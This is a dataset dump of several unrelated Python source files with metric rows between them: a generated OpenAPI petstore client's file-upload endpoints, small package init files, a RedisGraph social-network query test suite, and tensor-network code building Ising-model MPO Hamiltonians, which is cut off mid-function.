asynchronous HTTP request, please pass async_req=True
>>> thread = api.upload_file(pet_id, async_req=True)
>>> result = thread.get()
Args:
pet_id (int): ID of pet to update
Keyword Args:
additional_metadata (str): Additional data to pass to server. [optional]
file (file_type): file to upload. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
api_response.ApiResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['pet_id'] = \
pet_id
return self.call_with_http_info(**kwargs)
self.upload_file = Endpoint(
settings={
'response_type': (api_response.ApiResponse,),
'auth': [
'petstore_auth'
],
'endpoint_path': '/pet/{petId}/uploadImage',
'operation_id': 'upload_file',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'pet_id',
'additional_metadata',
'file',
],
'required': [
'pet_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'pet_id':
(int,),
'additional_metadata':
(str,),
'file':
(file_type,),
},
'attribute_map': {
'pet_id': 'petId',
'additional_metadata': 'additionalMetadata',
'file': 'file',
},
'location_map': {
'pet_id': 'path',
'additional_metadata': 'form',
'file': 'form',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'multipart/form-data'
]
},
api_client=api_client,
callable=__upload_file
)
def __upload_file_with_required_file(
self,
pet_id,
required_file,
**kwargs
):
"""uploads an image (required) # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.upload_file_with_required_file(pet_id, required_file, async_req=True)
>>> result = thread.get()
Args:
pet_id (int): ID of pet to update
required_file (file_type): file to upload
Keyword Args:
additional_metadata (str): Additional data to pass to server. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
api_response.ApiResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['pet_id'] = \
pet_id
kwargs['required_file'] = \
required_file
return self.call_with_http_info(**kwargs)
self.upload_file_with_required_file = Endpoint(
settings={
'response_type': (api_response.ApiResponse,),
'auth': [
'petstore_auth'
],
'endpoint_path': '/fake/{petId}/uploadImageWithRequiredFile',
'operation_id': 'upload_file_with_required_file',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'pet_id',
'required_file',
'additional_metadata',
],
'required': [
'pet_id',
'required_file',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'pet_id':
(int,),
'required_file':
(file_type,),
'additional_metadata':
(str,),
},
'attribute_map': {
'pet_id': 'petId',
'required_file': 'requiredFile',
'additional_metadata': 'additionalMetadata',
},
'location_map': {
'pet_id': 'path',
'required_file': 'form',
'additional_metadata': 'form',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'multipart/form-data'
]
},
api_client=api_client,
callable=__upload_file_with_required_file
)
| 35.712121 | 174 | 0.44204 | 3,636 | 42,426 | 4.902915 | 0.066557 | 0.031806 | 0.026252 | 0.027262 | 0.864475 | 0.843832 | 0.832894 | 0.815617 | 0.806249 | 0.803052 | 0 | 0.00305 | 0.474497 | 42,426 | 1,187 | 175 | 35.742207 | 0.796546 | 0.323174 | 0 | 0.655473 | 0 | 0 | 0.223733 | 0.028354 | 0 | 0 | 0 | 0 | 0 | 1 | 0.012438 | false | 0 | 0.007463 | 0 | 0.032338 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0a544b6b024c9eafcbcf82cbbd577738162c02ca | 33 | py | Python | qa_query/whoosh_utils/__init__.py | scollins83/qa_query | 63240ec8e6d34a0bbdfc199aae0631cc35fac4e0 | [
"MIT"
] | 6 | 2019-09-08T02:38:38.000Z | 2020-05-19T23:31:40.000Z | qa_query/whoosh_utils/__init__.py | scollins83/qa_query | 63240ec8e6d34a0bbdfc199aae0631cc35fac4e0 | [
"MIT"
] | 1 | 2019-09-09T11:20:38.000Z | 2019-09-09T11:20:38.000Z | qa_query/whoosh_utils/__init__.py | scollins83/qa_query | 63240ec8e6d34a0bbdfc199aae0631cc35fac4e0 | [
"MIT"
] | 14 | 2019-09-08T00:42:54.000Z | 2021-04-06T15:18:18.000Z | from .analysis import QAAnalyzer
| 16.5 | 32 | 0.848485 | 4 | 33 | 7 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121212 | 33 | 1 | 33 | 33 | 0.965517 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0a55c2f3b1d6489d9bf0456794c75c5b03744e91 | 150 | py | Python | tunetools/__init__.py | Keytoyze/TuneTools | 71b45f5b061d7fccc36e25297811647bdb1e5fe8 | [
"MIT"
] | 1 | 2021-07-19T05:52:06.000Z | 2021-07-19T05:52:06.000Z | tunetools/__init__.py | Keytoyze/TuneTools | 71b45f5b061d7fccc36e25297811647bdb1e5fe8 | [
"MIT"
] | null | null | null | tunetools/__init__.py | Keytoyze/TuneTools | 71b45f5b061d7fccc36e25297811647bdb1e5fe8 | [
"MIT"
] | null | null | null | from .core import *
from .search_space import *
from .search_types import *
from .config import *
from .package_info import *
from .main import main
| 18.75 | 27 | 0.76 | 22 | 150 | 5.045455 | 0.454545 | 0.45045 | 0.288288 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 150 | 7 | 28 | 21.428571 | 0.888 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
6a5a9ba67d2febb288b4fc0434dca9e8d4274a7c | 18,530 | py | Python | tests/flow/test_social.py | ushachar/RedisGraph | b14b7a5afd1d5ab8c964a9c3da5e322a2b7d694d | [
"Ruby",
"ISC",
"MIT"
] | null | null | null | tests/flow/test_social.py | ushachar/RedisGraph | b14b7a5afd1d5ab8c964a9c3da5e322a2b7d694d | [
"Ruby",
"ISC",
"MIT"
] | null | null | null | tests/flow/test_social.py | ushachar/RedisGraph | b14b7a5afd1d5ab8c964a9c3da5e322a2b7d694d | [
"Ruby",
"ISC",
"MIT"
] | null | null | null | import os
import sys
from redisgraph import Graph
sys.path.append(os.path.dirname(os.path.abspath(__file__)) + '/../../demo/social/')
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
from reversepattern import ReversePattern
from base import FlowTestsBase
import social_queries as queries
import social_utils
redis_graph = None
class testSocialFlow(FlowTestsBase):
def __init__(self):
super(testSocialFlow, self).__init__()
global redis_graph
redis_con = self.env.getConnection()
redis_graph = Graph(social_utils.graph_name, redis_con)
social_utils.populate_graph(redis_con, redis_graph)
def assert_reversed_pattern(self, query, resultset):
# Test reversed pattern query.
reversed_query = ReversePattern().reverse_query_pattern(query)
# print "reversed_query: %s" % reversed_query
actual_result = redis_graph.query(reversed_query)
# assert result set
self.env.assertEqual(resultset.result_set, actual_result.result_set)
# assert query run time
self._assert_equalish(resultset.run_time_ms, actual_result.run_time_ms)
def test00_graph_entities(self):
global redis_graph
q = queries.graph_entities.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.graph_entities)
# assert query run time
self._assert_run_time(actual_result, queries.graph_entities)
# assert reversed pattern.
self.assert_reversed_pattern(q, actual_result)
def test01_relation_type_strings(self):
global redis_graph
q = queries.relation_type_counts.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.relation_type_counts)
# assert query run time
self._assert_run_time(actual_result, queries.relation_type_counts)
# assert reversed pattern.
self.assert_reversed_pattern(q, actual_result)
def test02_subset_of_people(self):
global redis_graph
q = queries.subset_of_people.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.subset_of_people)
# assert query run time
self._assert_run_time(actual_result, queries.subset_of_people)
# assert reversed pattern.
self.assert_reversed_pattern(q, actual_result)
def test03_my_friends(self):
global redis_graph
q = queries.my_friends_query.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.my_friends_query)
# assert query run time
self._assert_run_time(actual_result, queries.my_friends_query)
# assert reversed pattern.
self.assert_reversed_pattern(q, actual_result)
def test04_friends_of_friends(self):
global redis_graph
q = queries.friends_of_friends_query.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.friends_of_friends_query)
# assert query run time
self._assert_run_time(actual_result, queries.friends_of_friends_query)
runtime = actual_result.run_time_ms
# assert reversed pattern.
self.assert_reversed_pattern(q, actual_result)
def test05_friends_of_friends_single_and_over_30(self):
global redis_graph
q = queries.friends_of_friends_single_and_over_30_query.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.friends_of_friends_single_and_over_30_query)
# assert query run time
self._assert_run_time(actual_result, queries.friends_of_friends_single_and_over_30_query)
# assert reversed pattern.
self.assert_reversed_pattern(q, actual_result)
def test06_friends_of_friends_visited_netherlands_and_single(self):
global redis_graph
q = queries.friends_of_friends_visited_netherlands_and_single_query.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.friends_of_friends_visited_netherlands_and_single_query)
# assert query run time
self._assert_run_time(actual_result, queries.friends_of_friends_visited_netherlands_and_single_query)
# assert reversed pattern.
self.assert_reversed_pattern(q, actual_result)
def test07_friends_visited_same_places_as_me(self):
global redis_graph
q = queries.friends_visited_same_places_as_me_query.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.friends_visited_same_places_as_me_query)
# assert query run time
self._assert_run_time(actual_result, queries.friends_visited_same_places_as_me_query)
# assert reversed pattern.
self.assert_reversed_pattern(q, actual_result)
def test08_countries_visited_by_roi_tal_boaz(self):
global redis_graph
q = queries.countries_visited_by_roi_tal_boaz.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.countries_visited_by_roi_tal_boaz)
# assert query run time
self._assert_run_time(actual_result, queries.countries_visited_by_roi_tal_boaz)
def test09_friends_older_than_me(self):
global redis_graph
q = queries.friends_older_than_me_query.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.friends_older_than_me_query)
# assert query run time
self._assert_run_time(actual_result, queries.friends_older_than_me_query)
# assert reversed pattern.
self.assert_reversed_pattern(q, actual_result)
def test10_friends_age_difference_query(self):
global redis_graph
q = queries.friends_age_difference_query.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.friends_age_difference_query)
# assert query run time
self._assert_run_time(actual_result, queries.friends_age_difference_query)
# assert reversed pattern.
self.assert_reversed_pattern(q, actual_result)
def test11_friends_who_are_older_than_average(self):
global redis_graph
q = queries.friends_who_are_older_than_average.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.friends_who_are_older_than_average)
# assert query run time
self._assert_run_time(actual_result, queries.friends_who_are_older_than_average)
def test12_how_many_countries_each_friend_visited(self):
global redis_graph
q = queries.how_many_countries_each_friend_visited_query.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.how_many_countries_each_friend_visited_query)
# assert query run time
self._assert_run_time(actual_result, queries.how_many_countries_each_friend_visited_query)
# assert reversed pattern.
self.assert_reversed_pattern(q, actual_result)
def test13_visit_purpose_of_each_country_i_visited(self):
global redis_graph
q = queries.visit_purpose_of_each_country_i_visited_query.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.visit_purpose_of_each_country_i_visited_query)
# assert query run time
self._assert_run_time(actual_result, queries.visit_purpose_of_each_country_i_visited_query)
# assert reversed pattern.
self.assert_reversed_pattern(q, actual_result)
def test14_who_was_on_business_trip(self):
global redis_graph
q = queries.who_was_on_business_trip_query.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.who_was_on_business_trip_query)
# assert query run time
self._assert_run_time(actual_result, queries.who_was_on_business_trip_query)
# assert reversed pattern.
self.assert_reversed_pattern(q, actual_result)
def test15_number_of_vacations_per_person(self):
global redis_graph
NUM_EXPECTED_RESULTS = 6
q = queries.number_of_vacations_per_person_query.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_actual_results_contained_in_expected_results(
actual_result,
queries.number_of_vacations_per_person_query,
NUM_EXPECTED_RESULTS)
# assert query run time
self._assert_run_time(actual_result, queries.number_of_vacations_per_person_query)
# assert reversed pattern.
self.assert_reversed_pattern(q, actual_result)
def test16_all_reachable_friends_query(self):
global redis_graph
q = queries.all_reachable_friends_query.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.all_reachable_friends_query)
# assert query run time
self._assert_run_time(actual_result, queries.all_reachable_friends_query)
# assert reversed pattern.
self.assert_reversed_pattern(q, actual_result)
def test17_all_reachable_countries_query(self):
global redis_graph
q = queries.all_reachable_countries_query.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.all_reachable_countries_query)
# assert query run time
self._assert_run_time(actual_result, queries.all_reachable_countries_query)
# assert reversed pattern.
self.assert_reversed_pattern(q, actual_result)
def test18_reachable_countries_or_people_query(self):
global redis_graph
q = queries.reachable_countries_or_people_query.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.reachable_countries_or_people_query)
# assert query run time
self._assert_run_time(actual_result, queries.reachable_countries_or_people_query)
# assert reversed pattern.
self.assert_reversed_pattern(q, actual_result)
def test19_all_reachable_countries_or_people_query(self):
global redis_graph
q = queries.all_reachable_countries_or_people_query.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.all_reachable_countries_or_people_query)
# assert query run time
self._assert_run_time(actual_result, queries.all_reachable_countries_or_people_query)
# assert reversed pattern.
self.assert_reversed_pattern(q, actual_result)
def test20_all_reachable_entities_query(self):
global redis_graph
q = queries.all_reachable_entities_query.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.all_reachable_entities_query)
# assert query run time
self._assert_run_time(actual_result, queries.all_reachable_entities_query)
# assert reversed pattern.
self.assert_reversed_pattern(q, actual_result)
def test21_all_reachable_people_min_2_hops_query(self):
global redis_graph
q = queries.all_reachable_people_min_2_hops_query.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.all_reachable_people_min_2_hops_query)
# assert query run time
self._assert_run_time(actual_result, queries.all_reachable_people_min_2_hops_query)
# assert reversed pattern.
self.assert_reversed_pattern(q, actual_result)
def test22_happy_birthday(self):
global redis_graph
q = queries.happy_birthday_query.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.happy_birthday_query)
# assert query run time
self._assert_run_time(actual_result, queries.happy_birthday_query)
def test23_friends_age_statistics(self):
global redis_graph
q = queries.friends_age_statistics_query.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.friends_age_statistics_query)
# assert query run time
self._assert_run_time(actual_result, queries.friends_age_statistics_query)
# assert reversed pattern.
self.assert_reversed_pattern(q, actual_result)
def test24_all_paths_leads_to_greece_query(self):
global redis_graph
q = queries.all_paths_leads_to_greece_query.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.all_paths_leads_to_greece_query)
# assert query run time
self._assert_run_time(actual_result, queries.all_paths_leads_to_greece_query)
# assert reversed pattern.
self.assert_reversed_pattern(q, actual_result)
def test25_number_of_paths_to_places_visited(self):
global redis_graph
q = queries.number_of_paths_to_places_visited.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.number_of_paths_to_places_visited)
# assert query run time
self._assert_run_time(actual_result, queries.number_of_paths_to_places_visited)
def test26_pagerank_friends(self):
global redis_graph
q = queries.pagerank_friends.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.pagerank_friends)
# assert query run time
self._assert_run_time(actual_result, queries.pagerank_friends)
def test27_edge_counting(self):
global redis_graph
aggregations = [
"match (a:person)-[e]->(b) return a.name, count(e) ORDER BY a.name", # Number of outgoing edges.
"match (a)-[e]->(b:person) return b.name, count(e) ORDER BY b.name", # Number of incoming edges.
"match (a)-[e:friend]->(b) return a.name, count(e) ORDER BY a.name", # Number of typed outgoing edges.
"match (a)-[e:friend]->(b) return b.name, count(e) ORDER BY b.name" # Number of typed incoming edges.
]
none_aggregation = [
"match (a:person) WHERE outdegree(a) > 0 RETURN a.name, outdegree(a) ORDER BY a.name", # Number of outgoing edges.
"match (a:person) WHERE indegree(a) > 0 RETURN a.name, indegree(a) ORDER BY a.name", # Number of incoming edges.
"match (a:person) WHERE outdegree(a, 'friend') > 0 RETURN a.name, outdegree(a, 'friend') ORDER BY a.name", # Number of typed outgoing edges.
"match (a:person) WHERE indegree(a, 'friend') > 0 RETURN a.name, indegree(a, 'friend') ORDER BY a.name" # Number of typed incoming edges.
]
for i in range(len(aggregations)):
result_agg = redis_graph.query(aggregations[i]).result_set
result_none_agg = redis_graph.query(none_aggregation[i]).result_set
self.env.assertTrue(result_agg == result_none_agg)
def test28_delete_friendships(self):
global redis_graph
q = queries.delete_friendships_query.query
actual_result = redis_graph.query(q)
# assert query run time
self._assert_run_time(actual_result, queries.delete_friendships_query)
def test29_delete_person(self):
global redis_graph
q = queries.delete_person_query.query
actual_result = redis_graph.query(q)
# assert query run time
self._assert_run_time(actual_result, queries.delete_person_query)
def test30_post_delete_label(self):
global redis_graph
q = queries.post_delete_label_query.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.post_delete_label_query)
# assert query run time
self._assert_run_time(actual_result, queries.post_delete_label_query)
| 36.333333 | 153 | 0.705397 | 2,348 | 18,530 | 5.108177 | 0.076661 | 0.114057 | 0.091879 | 0.056862 | 0.870519 | 0.851676 | 0.798149 | 0.736285 | 0.70727 | 0.656578 | 0 | 0.005583 | 0.236427 | 18,530 | 509 | 154 | 36.404715 | 0.842109 | 0.111495 | 0 | 0.464883 | 0 | 0.026756 | 0.039643 | 0 | 0 | 0 | 0 | 0 | 0.280936 | 1 | 0.110368 | false | 0 | 0.023411 | 0 | 0.137124 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6a695bf5d1f8ff799ff65a990c03f07b752cce24 | 26 | py | Python | api/export/__init__.py | imdeepmind/ResearchNote | cfaed6076c028d83035d561456bbb911d43eedbe | [
"MIT"
] | null | null | null | api/export/__init__.py | imdeepmind/ResearchNote | cfaed6076c028d83035d561456bbb911d43eedbe | [
"MIT"
] | null | null | null | api/export/__init__.py | imdeepmind/ResearchNote | cfaed6076c028d83035d561456bbb911d43eedbe | [
"MIT"
] | null | null | null | from .export import Export | 26 | 26 | 0.846154 | 4 | 26 | 5.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.115385 | 26 | 1 | 26 | 26 | 0.956522 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6a69eedf1ee00c806199f82ff78168bb331415d5 | 6,968 | py | Python | SpinSystems_2d.py | alessandro-santini/Tensor-Network | 3f3c52d61a7ea3d2ceedb03d08f40ad4d153b56e | [
"MIT"
] | null | null | null | SpinSystems_2d.py | alessandro-santini/Tensor-Network | 3f3c52d61a7ea3d2ceedb03d08f40ad4d153b56e | [
"MIT"
] | null | null | null | SpinSystems_2d.py | alessandro-santini/Tensor-Network | 3f3c52d61a7ea3d2ceedb03d08f40ad4d153b56e | [
"MIT"
] | null | null | null | import MPO_class as MPO
import numpy as np
def IsingMPO_2D(Lx, Ly, h=0., J=1):
L = Lx*Ly
Ham = MPO.MPO(L, 2)
# Pauli Matrices
Sx = np.array([[0, 1], [1, 0]])
Sz = np.array([[1, 0], [0,-1]])
for i in range(1, L-1):
H = np.zeros([2+Ly, 2+Ly, 2, 2])
H[0, 0, :, :] = np.eye(2)
H[1, 0, :, :] = Sz
for j in range(1, Ly):
H[1+j,j,:,:] = np.eye(2)
if i<(Ly*(Lx-1)):
H[-1,-2,:,:] = -J*Sz
else:
H[-1,-2,:,:] = np.eye(2)
if (i+1)%(Ly) != 0:
H[-1,1,:,:] = -J*Sz
H[-1,0,:,:] = -h*Sx
H[-1,-1,:,:] = np.eye(2)
Ham.W[i] = H
HL = np.zeros([1,2+Ly,2,2])
HR = np.zeros([2+Ly,1,2,2])
HL[0,0, :,:] = -h*Sx
HL[0,1, :,:] = -J*Sz
HL[0,-2,:,:] = -J*Sz
HL[0,-1,:,:] = np.eye(2)
HR[0, 0,:,:] = np.eye(2)
HR[1, 0,:,:] = Sz
HR[-1,0,:,:] = -h*Sx
Ham.W[0] = HL
Ham.W[-1] = HR
return Ham
def IsingMPO_2D_gen_field(Lx, Ly, h=(0.,0.,0.), J=1):
L = Lx*Ly
Ham = MPO.MPO(L, 2)
# Pauli Matrices
Sx = np.array([[0, 1], [1, 0]])
Sy = np.array([[0,-1j],[1j,0]])
Sz = np.array([[1, 0], [0,-1]])
hS = -h[0]*Sx-h[1]*Sy-h[2]*Sz
for i in range(1, L-1):
H = np.zeros([2+Ly, 2+Ly, 2, 2])
H[0, 0, :, :] = np.eye(2)
H[1, 0, :, :] = Sz
for j in range(1, Ly):
H[1+j,j,:,:] = np.eye(2)
if i<(Ly*(Lx-1)):
H[-1,-2,:,:] = -J*Sz
else:
H[-1,-2,:,:] = np.eye(2)
if (i+1)%(Ly) != 0:
H[-1,1,:,:] = -J*Sz
H[-1,0,:,:] = hS
H[-1,-1,:,:] = np.eye(2)
Ham.W[i] = H
HL = np.zeros([1,2+Ly,2,2])
HR = np.zeros([2+Ly,1,2,2])
HL[0,0, :,:] = hS
HL[0,1, :,:] = -J*Sz
HL[0,-2,:,:] = -J*Sz
HL[0,-1,:,:] = np.eye(2)
HR[0, 0,:,:] = np.eye(2)
HR[1, 0,:,:] = Sz
HR[-1,0,:,:] = hS
Ham.W[0] = HL
Ham.W[-1] = HR
return Ham
def IsingMPO_2D_Spiral_MPS(L, h=0., J=1):
def spiral(rows, columns):
matrix = np.zeros((rows,columns))
row, column, value = 0, 0, rows*columns-1
while row < rows and column < columns:
for i in range(column, columns):
matrix[row,i] = value
value -= 1
row += 1
for i in range(row, rows):
matrix[i,columns - 1] = value
value -= 1
columns -= 1
if row < rows:
for i in range(columns - 1, column - 1, -1):
matrix[rows - 1,i] = value
value -= 1
rows -= 1
if column < columns:
for i in range(rows - 1, row - 1, -1):
matrix[i,column] = value
value -= 1
column += 1
return matrix
def compute_dim_MPO(L):
config = spiral(L,L)
dim = []
nearest = []
for x in range(L*L):
i,j = np.where(config == x)
i = i[0]; j = j[0]
nn = []
if i !=0: nn.append(config[i-1,j])
if j !=0: nn.append(config[i,j-1])
if i !=L-1: nn.append(config[i+1,j])
if j !=L-1: nn.append(config[i,j+1])
nn = np.array(nn)
nearest.append( np.array(nn[nn>config[i,j]]-config[i,j],int))
new_dim = int(np.max(nn-config[i,j]) + 2)
if x > 0:
if new_dim < dim[x-1][1]:
dim.append((dim[x-1][1],dim[x-1][1]-1,2,2))
else:
dim.append((dim[x-1][1],new_dim,2,2))
else:
dim.append((1,new_dim,2,2))
dim[-1] = (dim[-2][1],1,2,2)
return dim,nearest
Ham = MPO.MPO(L*L, 2)
Ham.config = np.array(spiral(L,L),int)
# Pauli Matrices
Sx = np.array([[0, 1], [1, 0]])
Sz = np.array([[1, 0], [0,-1]])
dimW,nn = compute_dim_MPO(L)
for i,dim in enumerate(dimW):
Ham.W[i] = np.zeros(dim)
# Left Bond
Ham.W[0][0,0,:,:] = - h*Sx
for k in nn[0]:
Ham.W[0][0,k,:,:] = -J*Sz
Ham.W[0][0,-1,:,:] = np.eye(2)
# Right Bond
Ham.W[-1][0,0,:,:] = np.eye(2)
Ham.W[-1][1,0,:,:] = Sz
Ham.W[-1][2,0,:,:] = -h*Sx
# Bulk Bonds
for i in range(1,L**2-1):
Ham.W[i][0,0,:,:] = np.eye(2)
Ham.W[i][-1,0,:,:] = -h*Sx
Ham.W[i][1,0,:,:] = Sz
for k in nn[i]:
Ham.W[i][-1,k,:,:] = -J*Sz
for k in range(2,Ham.W[i].shape[0]-1):
Ham.W[i][k,k-1,:,:] = np.eye(2)
Ham.W[i][-1,-1,:,:] = np.eye(2)
return Ham
def IsingMPO_2D_diagonal_MPS(L, h=0., J=1):
def diagonal_matrix(L):
sites = np.arange(L*L)
k = 1
pos = 0
dist = L-1
mat = np.zeros((L,L))
while(dist>-L):
mat += np.diag(sites[pos:(pos+k)],dist)
pos += k
if dist > 0:
k+=1
else:
k-= 1
dist -= 1
return np.fliplr(mat)
def compute_dim_MPO(L):
config = diagonal_matrix(L)
dim = []
nearest = []
for x in range(L*L):
i,j = np.where(config == x)
i = i[0]; j = j[0]
nn = []
if i !=0: nn.append(config[i-1,j])
if j !=0: nn.append(config[i,j-1])
if i !=L-1: nn.append(config[i+1,j])
if j !=L-1: nn.append(config[i,j+1])
nn = np.array(nn)
nearest.append( np.array(nn[nn>config[i,j]]-config[i,j],int))
new_dim = int(np.max(nn-config[i,j]) + 2)
if x > 0:
if new_dim < dim[x-1][1]:
dim.append((dim[x-1][1],dim[x-1][1]-1,2,2))
else:
dim.append((dim[x-1][1],new_dim,2,2))
else:
dim.append((1,new_dim,2,2))
dim[-1] = (dim[-2][1],1,2,2)
return dim,nearest
Ham = MPO.MPO(L*L, 2)
Ham.config = np.array(diagonal_matrix(L),int)
# Pauli Matrices
Sx = np.array([[0, 1], [1, 0]])
Sz = np.array([[1, 0], [0,-1]])
dimW,nn = compute_dim_MPO(L)
